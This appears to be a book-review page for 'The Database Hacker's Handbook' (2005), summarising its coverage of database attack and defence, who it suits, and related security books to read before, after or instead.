The Database Hacker's Handbook
Defending Database Servers
Litchfield, Anley, Heasman, and Grindlay's exhaustive 2005 reference on attacking and defending Oracle, SQL Server, DB2, MySQL, PostgreSQL, Sybase, and Informix — the era when the database engine itself was the soft target.
As an Amazon Associate we earn from qualifying purchases. The link above is sponsored.
- Published
- 2005
- Publisher
- Wiley
- Pages
- 500
- Language
- English
Read this if
Vulnerability researchers and DBAs interested in the genealogy of database security. The Oracle and SQL Server chapters are still the most thorough printed references on the engines' internal attack surface and the patterns Litchfield made famous.
Skip this if
Anyone needing current cloud-database (RDS, Aurora, Cosmos, BigQuery) tradecraft, modern application-layer SQLi (handled by The Web Application Hacker's Handbook), or NoSQL-injection techniques. The book pre-dates almost everything load-bearing in 2026 database security.
Key takeaways
- Database engines were once routinely RCE-able from a low-privileged session; the chapters document why the discipline shifted toward managed cloud databases.
- The Oracle PL/SQL injection material is still the canonical reference and influenced a generation of vulnerability research.
- The book's structural argument — every database is a different OS — explains why per-engine deep knowledge is still required for serious database security work.
Notes
Pair with The Web Application Hacker's Handbook (Stuttard / Pinto) for the application-layer view that displaced most of this book's relevance and with Litchfield's later research (Oracle Hacker's Handbook, SQL Server vulnerability research) for the depth-on-one-engine companions. A historical reference today, but the only printed source of its kind for the engine-internals era.
What to read before
What to read before The Database Hacker's Handbook →Intermediate · 2021
Real-World Cryptography
David Wong's hands-on tour of the cryptographic primitives, protocols and pitfalls that show up in actual production systems, with deliberate attention to TLS, Noise, modern AEAD, and post-quantum.
Intermediate · 2021
Designing Secure Software
Loren Kohnfelder, the original PKI author, on how to weave security thinking through requirements, design, implementation and operations rather than bolt it on at the end.
Intermediate · 2014
Threat Modeling
Adam Shostack's practitioner-oriented introduction to threat modeling: STRIDE, attack trees, and how to fit the practice into a real software-development lifecycle.
What to read next
What to read after The Database Hacker's Handbook →Advanced · 2006
The Art of Software Security Assessment
The 1200-page reference on auditing C/C++ codebases for security: parsing complex memory and integer interactions, language pitfalls, and how vulnerabilities arise from interactions between layers.
Advanced · 2011
The Tangled Web
The deepest book ever written on the strange, accreted security model of the web browser.
Advanced · 2022
Gray Hat Hacking
A multi-author breadth-first reference covering the modern offensive landscape: web, binary, hardware, IoT, mobile, cloud, and adversarial ML — the closest thing in print to a single-volume snapshot of where offensive security is.
Explore similar books
Alternatives to The Database Hacker's Handbook →Intermediate · 2021
Real-World Cryptography
David Wong's hands-on tour of the cryptographic primitives, protocols and pitfalls that show up in actual production systems, with deliberate attention to TLS, Noise, modern AEAD, and post-quantum.
Advanced · 2011
The Tangled Web
The deepest book ever written on the strange, accreted security model of the web browser.
Advanced · 2006
The Art of Software Security Assessment
The 1200-page reference on auditing C/C++ codebases for security: parsing complex memory and integer interactions, language pitfalls, and how vulnerabilities arise from interactions between layers.